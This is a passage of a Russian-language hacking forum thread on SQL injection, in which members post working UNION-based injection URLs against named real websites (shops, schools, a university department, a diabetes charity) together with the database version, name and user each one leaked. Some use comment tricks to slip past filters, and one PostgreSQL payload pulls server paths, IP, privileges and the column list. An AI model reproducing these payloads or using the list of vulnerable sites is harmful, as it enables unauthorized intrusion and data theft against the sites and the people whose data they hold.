SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. erbolg

    erbolg Member

    Joined:
    5 Nov 2021
    Messages:
    7
    Likes Received:
    13
    Reputations:
    3
    Code:
    http://www.bookgroup.info/041205/review.php?id=-53+union+select+1,2,3,concat_ws(0x23,version(),database(),user()),5--+-
    5.0.95
    haynes
    [email protected]

    Code:
    http://www.techsoeng.com/curriculum.php?id=-29%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10--+-&id_foto=54
    5.5.62-38.14-LOG
    SQL845107_1
    [email protected]

    Code:
    http://www.horpak4u.com/view_detail.php?id=-3245%27+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-
    5.7.37
    horpak4u_data2
    horpak4u_nueng@localhost
     
    #261 erbolg, 14 Jan 2022
    Last edited: 22 Jan 2022
    crlf and Baskin-Robbins like this.
    1. Duble

      Duble Member

      Joined:
      28 Oct 2015
      Messages:
      60
      Likes Received:
      6
      Reputations:
      0
      108к юзеров
       
      #262 Duble, 25 Jan 2022
      Last edited: 25 Jan 2022
      Baskin-Robbins, crlf and erbolg like this.
      1. erbolg

        erbolg Member

        Joined:
        5 Nov 2021
        Messages:
        7
        Likes Received:
        13
        Reputations:
        3
        Code:
        http://www.assassinatedrecords.com/prod_info.php?id=-69%27+/*!12345union*/+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13—+-
        5.5.60-0+Deb7U1-Log
        Db272916802
        [email protected]

        Code:
        https://dbsoft.org/newsitem.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x23,version(),database(),user()),7--+-
        5.7.34-log
        nuke
        nuke@localhost

        Code:
        http://oneplanetschool.com/pages/newsDetail.php?id=-12+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6--+-
        5.7.31-percona-sure1-log
        oneplanet_mydb
        oneplanetSol@localhost

        Code:
        https://www.ee.iitm.ac.in/news/newsdetail.php?id=-5%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9--+-
        10.6.5-MariaDB-1:10.6.5+maria~focal
        eeMVCweb
        eewebmvc@localhost

        Code:
        https://www.himachalirishta.com/viewphoto.php?id=HPR364711%27+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91--+-&Choice=1
        10.1.44-MariaDB
        himmat_hrlive
        himmat@localhost

        Code:
        http://piriya-international.com/product.php?id=1/*!12345UNION*/select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+-
        10.2.38-MARIADB
        NOPPADON_PIRIYA
        NOPPADON_IDESIGN@LOCALHOST

        Code:
        http://www.terasz.hu/galeria/main.php?inc=sorozat_reszlet&sorozat_id=-1120+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+-
        5.7.30
        kulturfoto
        [email protected]

        Code:
        https://www.lpmwatak.com/category.php?id=-4%27+/*!12345union*/+select+1,concat_ws(0x23,version(),database(),user())%2d%2d+-
        
        10.2.41-MariaDB-cll-lve
        lpmd9334_db
        lpmd9334_doni@localhost

        Code:
        https://ird.sut.ac.th/ird2020/readnews.php?id=-165%27+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%2d%2d+-
        5.5.68-MariaDB
        ird2020
        ird2020@localhost

        Code:
        http://www.myekooo.com/productlist.php?id=-597+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x23,version(),database(),user()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+-&tid=13
        5.5.19
        mysql3439283_db
        mysql3439283@gpRYIr1386

        Code:
        http://www.samspedy.com/shop/product.php?id=63+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14--+-
        5.6.51-cll-lve
        samspedy_shop
        cherry@localhost

        Code:
        https://www.yuyama.com.hk/en/productlist.php?cat=-60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x23,version(),database(),user()),28,29,30,31,32,33,34,35,36,37,38,39,40--+-
        5.5.65-MariaDB
        yuyama
        yuyama@localhost
         
        #263 erbolg, 27 Jan 2022
        Last edited: 2 Mar 2022
        crlf and Baskin-Robbins like this.
        1. erbolg

          erbolg Member

          Joined:
          5 Nov 2021
          Messages:
          7
          Likes Received:
          13
          Reputations:
          3
          Code:
          https://www.lateuaterra.com/news_item.php?id=-68+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7,8,9,10--+-&lang=100
          5.5.55
          terra2
          user_terra2@localhost

          Code:
          https://www.buddhisma2z.com/content.php?id=-179/*!12345union*/select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7,8,9--+-
          5.6.41-84.1
          pitijoy_a2z
          pitijoy_root@localhost

          Code:
          http://www.addzollubricants.com/product_details.php?product_id=-5/*!12345union*/select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14—+-
          5.7.23-23
          wwwc2csi_addzol
          wwwc2csi_addzol@localhost

          Code:
          https://www.pyramidmachine.in/product_details.php?pr_id=73+union+select+1,concat_ws(0x23,version(),database(),user()),3,4,5,6,7--+-&main_cat_id=pQ==
          5.7.36
          pyramidm_pyarmid
          pyramidm_admin@localhost

          Code:
          http://diabetesphilippines.org/HOME/viewevent.php?eventid=-615+union+all+select+concat_ws(0x23,version(),database(),user()),2,3--+-
          5.7.37-CLL-LVE
          SOFTITPR_DB_DIABETESPHIL
          SOFTITPR_DP@LOCALHOST

          Code:
          https://www.atcproductions.tv/hire/viewitem.php?itemid=-9+union+all+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9--+-
          5.6.51
          atcprodu_hire
          atcprodu_hire@localhost

          Code:
          http://imperium.su/pages.php?id=-5%27+union+select+1,2,3,4,concat_ws(0x23,version(),database(),user()),6,7—+-
          5.7.18-16
          imperium_db1
          imperium_db_user@localhost

          Code:
          https://myglobalshopee.com/product_details.php?id=-55fb8e3c27001b%27+union+select+1,2,concat_ws(0x23,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-
          10.1.44-MARIADB
          MYGSHOPE_MYGLOBS
          MYGSHOPE_MYGLOBS@LOCALHOST

          Code:
          http://gba-corona.com/news.php?id=-6/*!12345union*/select+1,2,3,concat_ws(0x23,version(),database(),user())--+-
          5.6.41-84.1
          ibizhq_gba
          ibizhq_gba@localhost
           
          #264 erbolg, 6 Mar 2022
          Last edited: 3 Apr 2022
          Baskin-Robbins and crlf like this.
          1. Huga12

            Huga12 New Member

            Joined:
            11 Apr 2022
            Messages:
            1
            Likes Received:
            2
            Reputations:
            0
            http://www.marciadalmondo.com/ita/dettagli_news.aspx?id=-4326 AND 1=0 UNION SELECT '1',$$ injected by imns $$CHR(60)CHR(60)$$VERSION >>> $$version()CHR(60)CHR(60)$$DATABASE >>> $$current_database()CHR(60)CHR(60)$$DB FILES >>> $$CHR(60)CHR(60)$$ - HBA >>> $$current_setting($$hba_file$$)CHR(60)CHR(60)$$ - DIRECTORY >>> $$current_setting($$data_directory$$)CHR(60)CHR(60)$$HOSTNAME AND IP ADDRESS >>> $$CHR(60)CHR(60)$$ - PORT >>> $$inet_server_port()CHR(60)CHR(60)$$ - ADDR >>> $$inet_server_addr()CHR(60)CHR(60)$$USER >>> $$userCHR(60)CHR(60)$$PRIVILEGES >>> $$(SELECT usename$$ >> $$usecreatedb$$ >> $$usesuper FROM pg_user)CHR(60)CHR(60)CHR(60)CHR(60)(SELECT ARRAY_TO_STRING(array(SELECT(CHR(60)CHR(60)table_nameCHR(32)CHR(62)CHR(62)CHR(62)CHR(32)column_name)::TEXT FROM information_schema.columns WHERE table_schema=$$public$$),CHR(60)CHR(60))),'3',null,null--+-
             
            Baskin-Robbins and crlf like this.